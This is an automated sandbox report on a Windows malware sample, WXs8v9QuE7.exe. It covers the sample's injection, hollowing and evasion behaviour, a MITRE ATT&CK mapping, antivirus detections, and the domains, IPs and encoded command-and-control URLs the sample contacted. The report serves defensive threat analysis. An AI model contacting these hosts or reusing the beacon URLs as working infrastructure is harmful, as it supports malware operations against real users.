          Source: Yara matchFile source: 00000001.00000002.301714612.00000000005D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.1.WXs8v9QuE7.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.WXs8v9QuE7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.WXs8v9QuE7.exe.2280000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.WXs8v9QuE7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.WXs8v9QuE7.exe.2280000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.WXs8v9QuE7.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection512Virtualization/Sandbox Evasion3Input Capture1Security Software Discovery131Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection512LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing11LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 438542 Sample: WXs8v9QuE7.exe Startdate: 22/06/2021 Architecture: WINDOWS Score: 100 33 www.shenghui118.com 2->33 35 www.reufhroir.com 2->35 37 2 other IPs or domains 2->37 53 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->53 55 Found malware configuration 2->55 57 Malicious sample detected (through community Yara rule) 2->57 59 5 other signatures 2->59 10 WXs8v9QuE7.exe 19 2->10         started        14 explorer.exe 2->14         started        signatures3 process4 dnsIp5 29 C:\Users\user\AppData\Local\...\pplsesniiplv, DOS 10->29 dropped 31 C:\Users\user\AppData\Local\...\System.dll, PE32 10->31 dropped 67 Detected unpacking (changes PE section rights) 10->67 69 Maps a DLL or memory area into another process 10->69 71 Tries to detect virtualization through RDTSC time measurements 10->71 17 WXs8v9QuE7.exe 10->17         started        39 mutanterestaurante.com 50.87.146.99, 49749, 80 UNIFIEDLAYER-AS-1US United States 14->39 41 www.fredrika-stahl.com 185.53.177.12, 49743, 80 TEAMINTERNET-ASDE Germany 14->41 43 16 other IPs or domains 14->43 73 System process connects to network (likely due to code injection or exploit) 14->73 20 autoconv.exe 14->20         started        file6 signatures7 process8 signatures9 45 Modifies the context of a thread in another process (thread injection) 17->45 47 Maps a DLL or memory area into another process 17->47 49 Sample uses process hollowing technique 17->49 51 Queues an APC in another process (thread injection) 17->51 22 cscript.exe 17->22         started        process10 signatures11 61 Modifies the context of a thread in another process (thread injection) 22->61 63 Maps a DLL or memory area into another process 22->63 65 Tries to detect virtualization through RDTSC time measurements 22->65 25 cmd.exe 1 22->25         started        process12 process13 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          WXs8v9QuE7.exe19%VirustotalBrowse
          WXs8v9QuE7.exe20%ReversingLabs
          WXs8v9QuE7.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsa7685.tmp\System.dll0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\nsa7685.tmp\System.dll0%ReversingLabs

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          18.2.cscript.exe.748a10.0.unpack100%AviraTR/Patched.Ren.GenDownload File
          18.2.cscript.exe.4d87960.5.unpack100%AviraTR/Patched.Ren.GenDownload File
          1.1.WXs8v9QuE7.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.2.WXs8v9QuE7.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.2.WXs8v9QuE7.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          0.2.WXs8v9QuE7.exe.2280000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.0.WXs8v9QuE7.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          0.0.WXs8v9QuE7.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File

          Domains

          SourceDetectionScannerLabelLink
          www.fredrika-stahl.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.doodstore.net/bp3i/?2db=/O9fLU9fKPl9hp8FjcQBjfSEDJBN8B2QQZ2zni9zphKaS5k3K3CvlS+mwENkfwkv1cT8&ApZx=O2MHiVr0W0%Avira URL Cloudsafe
          http://www.5xlsteve.com/bp3i/?2db=zbNXh78uhP7VzN8kPHFueaY47g6J6psPJhyFJvfKuCHih9LJaB8PnmAAQmuNnVgiv7yX&ApZx=O2MHiVr0W0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.mutanterestaurante.com/bp3i/?2db=E7M2l69Gv0yeE4KBOXHGh6mx//FtP199Dh6qlRwE96ss/V1ksNZ+8ksSpGi6EwZCpyax&ApZx=O2MHiVr0W0%Avira URL Cloudsafe
          http://www.tori2020.com/bp3i/?2db=MlxGGjj2GILR3uc1yrCD+B+Qm9+cwVH8bO7hosl1JjKtZPf8ruvdLFpmglVOZIulzoDe&ApZx=O2MHiVr0W0%Avira URL Cloudsafe
          http://www.motivactivewear.com/bp3i/?2db=zzYPr0OAQH7TXWaM6HNOV25V/HRJbXLG3d0AEq0Xu0niOsubCwaCiuhJfb7NIA/TR+lf&ApZx=O2MHiVr0W0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          www.oceancollaborative.com/bp3i/0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.fredrika-stahl.com/bp3i/?2db=cas+hsZJvZFo3GF+EdMNCMOiV1dGjFKaknimsFdRmzAJWDDXgl+w3pBTGW4WB38KsB49&ApZx=O2MHiVr0W0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          https://www.123-reg-new-domain.co.uk/iframe.html0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.purpleqube.com/bp3i/?2db=IkQuCFl7MCfBRj/Vz+o9SZKu4zQeP+5HQLx8WUcJbeVktEW19wEdA8Etbmrh51eTDYYM&ApZx=O2MHiVr0W100%Avira URL Cloudphishing

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.5xlsteve.com
          		94.136.40.51
          		truetrue
            		unknown
            www.fredrika-stahl.com
            		185.53.177.12
            		truetrueunknown
            vallble01.xshoppy.shop
            		75.2.124.199
            		truetrue
              		unknown
              www.grpsexportsandimports.com
              		52.74.134.26
              		truefalse
                		unknown
                www.shenghui118.com
                		45.192.104.89
                		truetrue
                  		unknown
                  doodstore.net
                  		67.199.248.12
                  		truetrue
                    		unknown
                    purpleqube.com
                    		119.81.95.146
                    		truetrue
                      		unknown
                      www.tori2020.com
                      		222.239.248.209
                      		truetrue
                        		unknown
                        www.9wsc.com
                        		23.225.101.32
                        		truetrue
                          		unknown
                          mutanterestaurante.com
                          		50.87.146.99
                          		truetrue
                            		unknown
                            motivactivewear.com
                            		34.102.136.180
                            		truefalse
                              		unknown
                              oceancollaborative.com
                              		184.168.131.241
                              		truetrue
                                		unknown
                                www.purpleqube.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.motivactivewear.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.reufhroir.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.doodstore.net
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.mutanterestaurante.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.oceancollaborative.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.underce.com
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.kocaelimanliftkiralama.site
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.kesat-ya10.com
                                                		unknown
                                                		unknowntrue
                                                  		unknown

                                                  Contacted URLs

                                                  NameMaliciousAntivirus DetectionReputation
                                                  http://www.doodstore.net/bp3i/?2db=/O9fLU9fKPl9hp8FjcQBjfSEDJBN8B2QQZ2zni9zphKaS5k3K3CvlS+mwENkfwkv1cT8&ApZx=O2MHiVr0Wtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.5xlsteve.com/bp3i/?2db=zbNXh78uhP7VzN8kPHFueaY47g6J6psPJhyFJvfKuCHih9LJaB8PnmAAQmuNnVgiv7yX&ApZx=O2MHiVr0Wtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.mutanterestaurante.com/bp3i/?2db=E7M2l69Gv0yeE4KBOXHGh6mx//FtP199Dh6qlRwE96ss/V1ksNZ+8ksSpGi6EwZCpyax&ApZx=O2MHiVr0Wtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.tori2020.com/bp3i/?2db=MlxGGjj2GILR3uc1yrCD+B+Qm9+cwVH8bO7hosl1JjKtZPf8ruvdLFpmglVOZIulzoDe&ApZx=O2MHiVr0Wtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.motivactivewear.com/bp3i/?2db=zzYPr0OAQH7TXWaM6HNOV25V/HRJbXLG3d0AEq0Xu0niOsubCwaCiuhJfb7NIA/TR+lf&ApZx=O2MHiVr0Wfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  www.oceancollaborative.com/bp3i/true
                                                  • Avira URL Cloud: safe
                                                  		low
                                                  http://www.fredrika-stahl.com/bp3i/?2db=cas+hsZJvZFo3GF+EdMNCMOiV1dGjFKaknimsFdRmzAJWDDXgl+w3pBTGW4WB38KsB49&ApZx=O2MHiVr0Wtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.purpleqube.com/bp3i/?2db=IkQuCFl7MCfBRj/Vz+o9SZKu4zQeP+5HQLx8WUcJbeVktEW19wEdA8Etbmrh51eTDYYM&ApZx=O2MHiVr0Wtrue
                                                  • Avira URL Cloud: phishing
                                                  		unknown

                                                  URLs from Memory and Binaries

                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpfalse
                                                    		high
                                                    http://www.fontbureau.comexplorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpfalse
                                                      		high
                                                      http://www.fontbureau.com/designersGexplorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpfalse
                                                        		high
                                                        http://www.fontbureau.com/designers/?explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpfalse
                                                          		high
                                                          http://www.founder.com.cn/cn/bTheexplorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.fontbureau.com/designers?explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpfalse
                                                            		high
                                                            http://www.tiro.comexplorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.fontbureau.com/designersexplorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpfalse
                                                              		high
                                                              http://nsis.sf.net/NSIS_ErrorErrorWXs8v9QuE7.exefalse
                                                                		high
                                                                http://www.goodfont.co.krexplorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.carterandcone.comlexplorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.sajatypeworks.comexplorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.typography.netDexplorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpfalse
                                                                  		high
                                                                  http://www.founder.com.cn/cn/cTheexplorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://fontfabrik.comexplorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.founder.com.cn/cnexplorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpfalse
                                                                    		high
                                                                    http://nsis.sf.net/NSIS_ErrorWXs8v9QuE7.exefalse
                                                                      		high
                                                                      http://www.jiyu-kobo.co.jp/explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://www.123-reg-new-domain.co.uk/iframe.htmlcscript.exe, 00000012.00000002.496418412.0000000004F02000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.fontbureau.com/designers8explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpfalse
                                                                        		high
                                                                        http://www.fonts.comexplorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpfalse
                                                                          		high
                                                                          http://www.sandoll.co.krexplorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://www.urwpp.deDPleaseexplorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://www.zhongyicts.com.cnexplorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://www.sakkal.comexplorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          		unknown

                                                                          Contacted IPs

                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs

                                                                          Public

                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          185.53.177.12
                                                                          		www.fredrika-stahl.comGermany
                                                                          		61969TEAMINTERNET-ASDEtrue
                                                                          50.87.146.99
                                                                          		mutanterestaurante.comUnited States
                                                                          		46606UNIFIEDLAYER-AS-1UStrue
                                                                          75.2.124.199
                                                                          		vallble01.xshoppy.shopUnited States
                                                                          		16509AMAZON-02UStrue
                                                                          119.81.95.146
                                                                          		purpleqube.comSingapore
                                                                          		36351SOFTLAYERUStrue
                                                                          34.102.136.180
                                                                          		motivactivewear.comUnited States
                                                                          		15169GOOGLEUSfalse
                                                                          184.168.131.241
                                                                          		oceancollaborative.comUnited States
                                                                          		26496AS-26496-GO-DADDY-COM-LLCUStrue
                                                                          222.239.248.209
                                                                          		www.tori2020.comKorea Republic of
                                                                          		9318SKB-ASSKBroadbandCoLtdKRtrue
                                                                          94.136.40.51
                                                                          		www.5xlsteve.comUnited Kingdom
                                                                          		20738GD-EMEA-DC-LD5GBtrue
                                                                          67.199.248.12
                                                                          		doodstore.netUnited States
                                                                          		396982GOOGLE-PRIVATE-CLOUDUStrue
                                                                          23.225.101.32
                                                                          		www.9wsc.comUnited States
                                                                          		40065CNSERVERSUStrue

                                                                          General Information

                                                                          Joe Sandbox Version:32.0.0 Black Diamond
                                                                          Analysis ID:438542
                                                                          Start date:22.06.2021
                                                                          Start time:18:23:13
                                                                          Joe Sandbox Product:CloudBasic
                                                                          Overall analysis duration:0h 10m 8s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:light
                                                                          Sample file name:WXs8v9QuE7.exe
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                          Number of analysed new started processes analysed:29
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • HDC enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Detection:MAL
                                                                          Classification:mal100.troj.evad.winEXE@9/3@16/10
                                                                          EGA Information:Failed
                                                                          HDC Information:
                                                                          • Successful, ratio: 27.1% (good quality ratio 25%)
                                                                          • Quality average: 77%
                                                                          • Quality standard deviation: 30.1%
                                                                          HCA Information:
                                                                          • Successful, ratio: 90%
                                                                          • Number of executed functions: 0
                                                                          • Number of non-executed functions: 0
                                                                          Cookbook Comments:
                                                                          • Adjust boot time
                                                                          • Enable AMSI
                                                                          • Found application associated with file extension: .exe
                                                                          Warnings:
                                                                          Show All
                                                                          • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                          • TCP Packets have been reduced to 100
                                                                          • Excluded IPs from analysis (whitelisted): 20.82.210.154, 204.79.197.200, 13.107.21.200, 93.184.220.29, 168.61.161.212, 104.43.193.48, 23.211.6.115, 23.35.236.56, 20.50.102.62, 51.103.5.159, 80.67.82.211, 80.67.82.235, 20.54.104.15, 40.112.88.60, 20.54.7.98
                                                                          • Excluded domains from analysis (whitelisted): cs9.wac.phicdn.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, www.bing.com, client.wns.windows.com, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net
                                                                          • Not all processes where analyzed, report is missing behavior information

                                                                          Simulations

                                                                          Behavior and APIs

                                                                          No simulations

                                                                          Joe Sandbox View / Context

                                                                          IPs

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                          185.53.177.12GLqbDRKePPp16Zr.exeGet hashmaliciousBrowse
                                                                          • www.and.today/bmfb/?2djxG=Yts8sH50jFIPGpa&sXR8Etn=9xwymc/IefVChBT+ma92A3rgxQiTRi/TdoRkkKjN09Xdfg/XB5VmY2hWTlePB89GMbMj
                                                                          BBTNC09.exeGet hashmaliciousBrowse
                                                                          • www.tateandlylefibres.com/5tsq/?UTdx-fG=SylDT7ZrX7TQRocqkeMXGoAHs2xP9/r0Sju7AmKOa5zuU38bBZ3YZtOXnY+mUIr66aeF&Ppd=Ib04qfqhozGpx8
                                                                          MR3Pv2KUUr.exeGet hashmaliciousBrowse
                                                                          • www.tateandlylefibres.com/5tsq/?SzuPiJ=SylDT7ZrX7TQRocqkeMXGoAHs2xP9/r0Sju7AmKOa5zuU38bBZ3YZtOXnY+ML4b6+YWF&PR3=uTyXQJdhBZjx
                                                                          WEIR RFQ# BJW 98728973 .docGet hashmaliciousBrowse
                                                                          • www.angelblake.com/n76/?g8cd9d=XtYXT8aJ/I7dzjq74aEsWprbRn1CUJ/Umc1UTvzR1ksM9WHMn9AJ/m2jV7zd4j7Uba4VXw==&sBW=KzrD
                                                                          50.87.146.99Tcopy.exeGet hashmaliciousBrowse
                                                                          • www.mutanterestaurante.com/bp3i/?RrTH=EVFT8Bbpw4nhxZ&TBZ0=E7M2l69Gv0yeE4KBOXHGh6mx//FtP199Dh6qlRwE96ss/V1ksNZ+8ksSpFCqLRJ63Xz2
                                                                          a8eC6O6okf.exeGet hashmaliciousBrowse
                                                                          • www.mutanterestaurante.com/bp3i/?PF=5jiDaNi8a4RT0&V0Gp=E7M2l69Gv0yeE4KBOXHGh6mx//FtP199Dh6qlRwE96ss/V1ksNZ+8ksSpFCAUh56zV72
                                                                          75.2.124.199Proforma Fatura INV60767894.PDF.exeGet hashmaliciousBrowse
                                                                          • www.bailcally.com/grv/?-Z2dsl=K/iIPR0Q06c9d1licXoZlmrqS6XG50aqcWhEiEXfQJJEWl2INNWFJ9ZWWZ+SMmfWNYbb&2dz=o8e0E
                                                                          lbqFKoALqe.exeGet hashmaliciousBrowse
                                                                          • www.colliapse.com/csv8/?8pHXLLhp=Z54U04wqGI300YwketVjcixyHBr4HpwtQE6vF0nldb1Lz0z4UH78CnHRphUvY/hBQThw&hbs=CnehJPdp6XLP_rwP
                                                                          iPv5du05Bu.exeGet hashmaliciousBrowse
                                                                          • www.ephwehemeral.com/8rg4/?alX=TXFDhzv0K60l&ExoHs=Spuz5MFTcH5hu0Eu8bPWX6w6kpRPV1e+2LvHjALXVfiJG6ly0exzQ74SWdynMJacHQIi
                                                                          119.81.95.146fS5DVkL6jm.exeGet hashmaliciousBrowse
                                                                          • www.purpleqube.com/bp3i/?jN9p20=IkQuCFl7MCfBRj/Vz+o9SZKu4zQeP+5HQLx8WUcJbeVktEW19wEdA8EtblLx2UOrd9xL&0huPx=F6ptWX3peH
                                                                          5t2CmTUhKc.exeGet hashmaliciousBrowse
                                                                          • www.purpleqube.com/bp3i/?o6tTHHhh=IkQuCFl7MCfBRj/Vz+o9SZKu4zQeP+5HQLx8WUcJbeVktEW19wEdA8EtbmnhqlSQaIYanfFQnQ==&3fuD_=S2MtYLGX0vFd
                                                                          a8eC6O6okf.exeGet hashmaliciousBrowse
                                                                          • www.purpleqube.com/bp3i/?PF=5jiDaNi8a4RT0&V0Gp=IkQuCFl7MCfBRj/Vz+o9SZKu4zQeP+5HQLx8WUcJbeVktEW19wEdA8EtblLbpk+rZ/5L

                                                                          Domains

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                          vallble01.xshoppy.shopfS5DVkL6jm.exeGet hashmaliciousBrowse
                                                                          • 75.2.19.252
                                                                          www.9wsc.comgz7dLhKlSQ.exeGet hashmaliciousBrowse
                                                                          • 23.225.101.32
                                                                          www.grpsexportsandimports.comTcopy.exeGet hashmaliciousBrowse
                                                                          • 52.74.134.26

                                                                          ASN

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                          UNIFIEDLAYER-AS-1UStender-1235416393.xlsmGet hashmaliciousBrowse
                                                                          • 192.185.88.195
                                                                          tender-1235416393.xlsmGet hashmaliciousBrowse
                                                                          • 192.185.88.195
                                                                          Order.exeGet hashmaliciousBrowse
                                                                          • 108.167.183.94
                                                                          Habib_Bank Payment Advice.doc__.rtfGet hashmaliciousBrowse
                                                                          • 162.144.79.7
                                                                          heoN5wnP2d.exeGet hashmaliciousBrowse
